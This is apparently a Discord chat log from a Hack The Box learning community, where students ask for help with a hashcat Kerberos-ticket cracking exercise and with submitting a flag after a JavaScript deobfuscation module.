maybe there are some that require the cert, idk... IDK about prizes. Yeah, I think I recall CyberApocolypse gives out a few grand to the top teams.

steady warren
#

If htb paths beginner or advanced

wooden silo
#

For week 6 in the "cracking passwords with hashcat" "Skills assessment-Hashcat" module it has me deicpher a Kerboros TGS ticket. where does the hassh start? Also when I run hashcat it is omitting the beginning of the hash from when it starts its search. I would send a screenshot but it doesn't appear I can.

shut vapor
autumn pilot
wooden silo
autumn pilot
wooden silo
#

How come on Analyzing it doesn't include "$8"

shell ore
#

the $8 was treated as an environment variable (bash uses $ as a special character to indicate them)

wooden silo
fathom mantle
#

hi guys who can help me witch deobfuscation i did deobfuscated the js code

but i didn know what i need to place in answer

wooden silo
shell ore
wooden silo
shell ore
#

thx for editing it

fathom mantle
shell ore
#

what section of the module?

fathom mantle
#

obfuscation js

shell ore
#

yes, what section?

fathom mantle
#

deobfuscation

#

sry

#

i understand english so so

safe star
dreamy oyster
fathom mantle
#

i tryed many times

#

can you send me example

#

how should the answer look like

#

flag="HTB{..........} i tryed how about that but thats incorrect answer

shell ore
#

just make sure ur taking stuff correctly

dreamy oyster
fathom mantle
#

i tryed

#

HTB{...} not works

#

{....} not works

#

"HTB{...} not works i dnt understand

shell ore
#

DM me, to avoid spoilers for others here

fathom mantle
#

maybe i very stupid xd

wooden silo
#

is there an option in hashcat to just scan for all available hash algos? I'm not seeing anything in the man page

shell ore